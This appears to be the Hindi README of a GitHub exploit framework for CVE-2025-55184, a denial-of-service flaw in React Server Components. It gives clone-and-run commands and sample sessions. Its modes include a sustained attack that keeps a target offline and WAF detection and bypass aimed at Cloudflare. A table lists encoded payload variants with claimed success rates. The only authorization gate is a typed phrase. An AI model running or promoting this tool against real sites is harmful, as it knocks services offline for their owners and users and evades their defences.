# CVE-2025-55184 के लिए पेशेवर-स्तरीय डिनायल ऑफ सर्विस (DoS) शोषण फ्रेमवर्क, जो React Server Components को लक्षित करता है। इसमें 8 अटैक मोड, WAF बायपास, और अधिकृत सुरक्षा परीक्षण तथा बग बाउंटी हंटिंग के लिए 10+ पेलोड वेरिएंट शामिल हैं।
"सीखते रहो, हैक करते रहो" - CyberTechAjju
🚀 त्वरित प्रारंभ • 📖 दस्तावेज़ीकरण • 💻 विशेषताएं • ⚠️ अस्वीकरण
CVE-2025-55184 एक उच्च-गंभीरता वाली डेनियल ऑफ सर्विस (DoS) भेद्यता है जो रिएक्ट सर्वर कंपोनेंट्स (RSC) इम्प्लीमेंटेशन को प्रभावित करती है। यह भेद्यता दूरस्थ हमलावरों को विशेष रूप से तैयार किए गए सर्कुलर रेफरेंस पेलोड के माध्यम से सेवा में पूर्ण व्यवधान उत्पन्न करने की अनुमति देती है।
| गुण | मान |
|---|---|
| CVE ID | CVE-2025-55184 |
| CVSS स्कोर | 7.5 (उच्च) |
| आक्रमण वेक्टर | नेटवर्क (दूरस्थ) |
| जटिलता | निम्न |
| आवश्यक विशेषाधिकार | कोई नहीं (बिना प्रमाणीकरण) |
| प्रभाव | पूर्ण DoS, संसाधन क्षरण |
यह केवल एक बुनियादी PoC नहीं है - यह गंभीर सुरक्षा शोधकर्ताओं और बग बाउंटी शिकारियों के लिए डिज़ाइन किया गया प्रोफेशनल-ग्रेड एक्सप्लॉइटेशन फ्रेमवर्क है।
git clone https://github.com/CyberTechAjju/CVE-2025-55184-POC-Expolit.git
cd CVE-2025-55184-POC-Expolit
./run.sh
बस इतना ही! निर्भरताएं स्वतः इंस्टॉल हो जाती हैं, इंटरैक्टिव मेनू आपका मार्गदर्शन करता है।
# Python directly
python3 exploit.py
# Advanced CLI mode
python3 cve_2025_55184_exploit.py -t <target> -m scan
| मोड | विवरण | उपयोग-मामला |
|---|---|---|
| 1. डिटेक्ट | निष्क्रिय फिंगरप्रिंटिंग | सुरक्षित टोह |
| 2. स्कैन | सक्रिय भेद्यता परीक्षण | पुष्टिकरण |
| 3. सिंगल | एक-शॉट PoC | त्वरित डेमो |
| 4. मल्टी | मल्टी-थ्रेडेड (5 थ्रेड्स) | मध्यम परीक्षण |
| 5. आक्रामक | उच्च-प्रभाव (10+ थ्रेड्स) | अधिकृत पेंटेस्ट |
| 6. WAF | WAF पहचान और बायपास | संरक्षित लक्ष्य |
| 7. रिपोर्ट | दस्तावेज़ीकरण उत्पन्न करें | बग बाउंटी सबमिशन |
| 8. निरंतर | 🔥 नया! लगातार DoS | लक्ष्य को डाउन रखता है! |
./run.sh
# Choose: 3 (SUSTAINED ATTACK)
# ✅ Target goes DOWN and STAYS DOWN
# ✅ Press Ctrl+C → Target RECOVERS automatically
इसके लिए एकदम सही:
स्वतः पहचाने जाने वाले WAF:
बायपास तकनीकें:
CVE-2025-55182 एक्सप्लॉइटेशन खोज रहे हैं? यह वीडियो देखें:
▶️ YouTube पर देखें: CVE-2025-55182 एक्सप्लॉइटेशन
╔══════════════════════════════════════════════════════════╗
║ ║
║ ______ ________ _____ ___ ___ ║
║ / ____/ / ____/ / / __ \ / _ \ / _ \ ║
║ / / __ / /_ / / \__ \ / / /_\ / /_\ \ ║
║ / /__ / \ /___/ / /___ ___/ /_/\__ /\__ / ║
║ \____/ /_____/______//____/ /_/ /_/ ║
║ ║
║ by CyberTechAjju | "KEEP LEARNING KEEP HACKING" ║
╚══════════════════════════════════════════════════════════╝
⚡ LIVE ATTACK DASHBOARD ⚡
┌─────────────────────────────────────────────────┐
│ Total Requests │ 847 │ ✓ │
│ Successful Attacks │ 521 │ 💥 │
│ Timeouts │ 521 │ ⏱️ │
│ Errors │ 326 │ ❌ │
│ Success Rate │ 61.5% │ 🎯 │
└─────────────────────────────────────────────────┘
./run.sh
Enter target: http://localhost:3000
Choose: 1 (Quick Scan)
Authorization: YES I AM AUTHORIZED
# Results in seconds!
./run.sh
Enter target: http://vulnerable-site.com
Choose: 3 (SUSTAINED ATTACK)
Authorization: YES I AM AUTHORIZED
Type: ATTACK
# Target goes down
# Monitor impact
# Press Ctrl+C when done
# Target recovers automatically!
./run.sh
Enter target: https://protected.cloudflare.com
Choose: 4 (WAF Bypass)
# Auto-detects Cloudflare
# Tries encoding variations
# Shows bypass success/failure
इस टूल में 10+ एक्सप्लॉइट विविधताएं शामिल हैं:
| पेलोड प्रकार | एन्कोडिंग | सफलता दर | विवरण |
|---|---|---|---|
| बेसिक | कोई नहीं | 95% | मूल सर्कुलर रेफरेंस |
| URL एन्कोडेड | URL | 80% | सरल फ़िल्टर को बायपास करें |
| Base64 | Base64 | 75% | पैटर्न मिलान से बचें |
| डबल URL | 2x URL | 70% | एडवांस्ड WAF बायपास |
| यूनिकोड | Unicode | 65% | कैरेक्टर एन्कोडिंग बचाव |
| Hex | Hexadecimal | 60% | Hex एस्केप सीक्वेंस |
| मिश्रित | विभिन्न | 55% | संयुक्त तकनीकें |
| फ्रैगमेंटेड | स्प्लिट | 50% | फ्रैगमेंट-आधारित बायपास |
| नेस्टेड | कोई नहीं | 85% | गहरी रिकर्शन |
| ऐरे-आधारित | कोई नहीं | 70% | ऐरे सर्कुलर रेफ्स |